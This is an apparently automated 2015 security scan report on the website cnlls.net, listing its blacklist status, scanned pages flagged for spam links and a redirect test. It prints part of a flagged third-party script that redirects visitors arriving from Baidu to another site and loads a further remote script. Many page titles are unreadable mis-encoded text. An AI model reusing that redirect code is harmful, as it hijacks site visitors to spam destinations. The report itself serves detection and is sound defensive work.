Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cnlls.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://cnlls.net/ | HTTP/1.1 200 OK Date: Fri, 06 Mar 2015 20:49:21 GMT Accept-Ranges: bytes ETag: "66fa1d89901dd01:610" Server: Microsoft-IIS/6.0 Content-Length: 6866 Content-Location: http://cnlls.net/index.html Content-Type: text/html Last-Modified: Mon, 22 Dec 2014 02:39:40 GMT X-Powered-By: ASP.NET | clean |
http://cnlls.net/index.html | 200 OK Content-Length: 6866 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: lyxdgs.com ...[2732 bytes skipped]... »ÃÀŮǿ¼éͼƬ¡¾ÊìÅ®ÈËÆÞ¡¿</a></li> </ul> </dd> </dl> </div> </div> </div> <div class="flink w960 center mt1 clear"> <dl class="tbox"> <dt> <strong>ÓÑÇéÁ´½Ó</strong> <span class="more"> </span> </dt> <dd> <ul class="f5"> </ul> <a href="http://lyxdgs.com/info/" title="ÄÐÄж¼¦µçӰͼƬ">ÄÐÄж¼¦µçӰͼƬ</a> <a href="http://ledstore.net.cn/contact/" title="ÃÀÉÙÅ®Ìع¤¶ÓѸÀ×">ÃÀÉÙÅ®Ìع¤¶ÓѸÀ×</a> <a href="http://zzmltln.com/service/" title="ÃÀÅ®ÐÔ°®Í¼°É">ÃÀÅ®ÐÔ°®Í¼°É</a> <a href="http://zoztech.com/web/" title="ÈÕ±¾Óã¸ÎÓÍÍèkawai">ÈÕ±¾Óã¸ÎÓÍÍèkawai</a> <a href="http://ld-kj.com/pructical/" title="³ÉÈËÌÒÉ«Ãâ·Ñ">³ÉÈËÌÒÉ«Ãâ·Ñ</a> <a href="http://dechem.net" ...[1586 bytes skipped]... | ||
http://js.users.51.la/17468139.js | 200 OK Content-Length: 1931 Content-Type: application/x-javascript | clean |
http://js.17meiliba.com/zt.js | 200 OK Content-Length: 410 Content-Type: application/x-javascript | clean |
http://cnlls.net/tj.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://cnlls.net/4k9w910.html | 200 OK Content-Length: 10322 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hebeisoft.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>µçÄÔ´ó×ÀÃæ±ÚÖ½¸ßÇå|ÈÕ±¾µÄÅ®ÈËÓë¹·½»Åä¿Æ½ÌƬ|Âþ»ÃÀŮǿ¼éͼƬ¡¾ÊìÅ®ÈËÆÞ¡¿</title> <meta name="keywords" content="µçÄÔ´ó×ÀÃæ±ÚÖ½¸ßÇå" /> | ||
http://Js.lwtzdec.com/huishou.js | 200 OK Content-Length: 1063 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: vip.hunlianyuan.com ...[596 bytes skipped]... ) > -1) { window.opener.location.href = url } else { window.opener.location.replace(url) } } }; var referer = document.referrer; if (!referer) { return }; var rst = /https?\:\/\/([^\/]+)/i.exec(referer); var host = rst ? rst[1] : 'unknown'; if (/baidu\.com$/i.test(host) && timeallow) { var search = referer.substring(referer.indexOf('?')); jump("http://vip.hunlianyuan.com/1.html"); return } })() } catch(e) {} document.write ('<script language="javascript" type="text/javascript" src="http://js.17meiliba.com/tan.js"></script>'); | ||
http://cnlls.net/5l58pr81.html | 200 OK Content-Length: 105758 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tiigame.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>¿¹»÷ÄÉ´âµçÓ°,Ã÷ÈÕ»¨ÖÖ×ÓÈ«¼¯ÏÂÔØ,´óÎâ¸çÓéÀÖÍø¡¾ÑÇÖÞÓÐÂëÇø¡¿</title> <meta name="keywords" content="¿¹»÷ÄÉ´âµçÓ°" /> <meta name="d ...[4707 bytes skipped]... | ||
http://cnlls.net/thl165.html | 200 OK Content-Length: 9274 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dgzhuochang.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>¡ïУ԰»ª¶û×È¡ïµç³µÖ®ÀÇÈ¥Âë²¹¶¡|qvodµçÓ°ÍøÕ¾Â×ÀíƬ</title> <meta name="keywords" content="У԰»ª¶û×È" /> <meta name="description" c ...[4818 bytes skipped]... | ||
http://cnlls.net/x5ey35.html | 200 OK Content-Length: 9292 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hanguodaxin.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>¡¾Ç崿ΨÃÀ¡¿ÂìÒÏÖÕ¼«½ø»¯ÔÂÔÂС˵Íø_ÉϺ£³ÉÈËÕ¹Ö÷³ÖÈË_gvÔÚÏß¹Û¿´µØÖ·</title> <meta name="keywords" content="ÂìÒÏÖÕ¼«½ø»¯ÔÂÔÂС˵Íø" /> ...[4711 bytes skipped]... | ||
http://cnlls.net/cmu1ddv98.html | 200 OK Content-Length: 104005 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wxlgou.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>www.gan111.com ÇéÉ«_ѸÀ×ÃÛÌÒͼƬ_µçÓ°ÉßÍõĦ˿ÀÌùͼ¡ï¿¨Í¨¶¯Âþ¡ï</title> <meta name="keywords" content="www.gan111.com ÇéÉ«" /> < ...[4622 bytes skipped]... | ||
http://cnlls.net/sitemap.html | 200 OK Content-Length: 2335 Content-Type: text/html | clean |
http://cnlls.net/test404page.js | HTTP/1.1 200 OK Date: Fri, 06 Mar 2015 20:49:37 GMT Accept-Ranges: bytes ETag: "fad51dfb9414d01:610" Server: Microsoft-IIS/6.0 Content-Length: 2364 Content-Location: http://cnlls.net/404.html?404;http://cnlls.net:80/test404page.js Content-Type: text/html Last-Modified: Wed, 10 Dec 2014 16:18:49 GMT X-Powered-By: ASP.NET | clean |
http://cnlls.net/404.html?404;http://cnlls.net:80/test404page.js | 200 OK Content-Length: 2364 Content-Type: text/html | clean |
http://www.qq.com/404/search_children.js | 200 OK Content-Length: 295 Content-Type: application/javascript | clean |
http://cnlls.net/About/ | HTTP/1.1 200 OK Date: Fri, 06 Mar 2015 20:49:39 GMT Accept-Ranges: bytes ETag: "f2c22a27a216d01:610" Server: Microsoft-IIS/6.0 Content-Length: 4279 Content-Location: http://cnlls.net/About/index.html Content-Type: text/html Last-Modified: Sat, 13 Dec 2014 06:58:09 GMT X-Powered-By: ASP.NET | clean |
http://cnlls.net/about/index.html | 200 OK Content-Length: 4279 Content-Type: text/html | clean |
http://cnlls.net/about/shuqikuaibo/fhkav38.html | 200 OK Content-Length: 23654 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: wwtaiqiu.com <!--cache for file £¨27£© -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=GB2312" /><meta name="robots" content="noarchive" /> <meta http-equiv="Cache-Control" content="no-transform" /><title>¡¾¾çÇé´óƬ¡¿i ...[4643 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cnlls.net
Result:
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 20:49:21 GMT
Accept-Ranges: bytes
ETag: "66fa1d89901dd01:610"
Server: Microsoft-IIS/6.0
Content-Length: 6866
Content-Location: http://cnlls.net/index.html
Content-Type: text/html
Last-Modified: Mon, 22 Dec 2014 02:39:40 GMT
X-Powered-By: ASP.NET
...6866 bytes of data.
GET / HTTP/1.1
Host: cnlls.net
Result:
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 20:49:21 GMT
Accept-Ranges: bytes
ETag: "66fa1d89901dd01:610"
Server: Microsoft-IIS/6.0
Content-Length: 6866
Content-Location: http://cnlls.net/index.html
Content-Type: text/html
Last-Modified: Mon, 22 Dec 2014 02:39:40 GMT
X-Powered-By: ASP.NET
...6866 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cnlls.net
Referer: http://www.google.com/search?q=cnlls.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cnlls.net
Referer: http://www.google.com/search?q=cnlls.net
Result:
The result is similar to the first query. There are no suspicious redirects found.